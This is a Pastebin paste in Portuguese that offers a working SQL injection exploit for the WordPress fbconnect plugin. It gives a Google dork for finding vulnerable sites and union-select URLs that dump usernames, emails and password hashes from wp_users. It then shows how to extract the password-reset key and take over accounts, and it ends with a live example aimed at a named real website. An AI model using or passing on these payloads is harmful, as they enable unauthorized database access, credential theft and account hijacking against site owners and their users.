Advertisement
Googleinurl

Exploit WORDPRESS fbconnect_action

Sep 30th, 2013
664
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. Exploit Wordpress pei pei pei
  2. DORK['1']:inurl:"/?fbconnect_action=myhome"
  3.  
  4.  
  5. http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]
  6.  
  7. EXPLOIT:
  8. Mostrando user,email,senha(user_login,user_email,user_pass):
  9. http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
  10.  
  11.  
  12. Com o email do usuário em mãos, vá até o painel de administrador.
  13.  
  14. http://VULL.COM/wp-login.php
  15. "click em Lost your password ?"
  16. É peça uma nova senha enviando para o e-mail.
  17.  
  18.  
  19. Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa​
  20.  
  21. http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--
  22.  
  23.  
  24. Vamos modificar a senha do usuario com a KEY CAPTURADA
  25.  
  26. http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
  27. USANDO:
  28. http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA
  29.  
  30. Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.
  31.  
  32.  
  33. EXEMPLO:
  34. http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement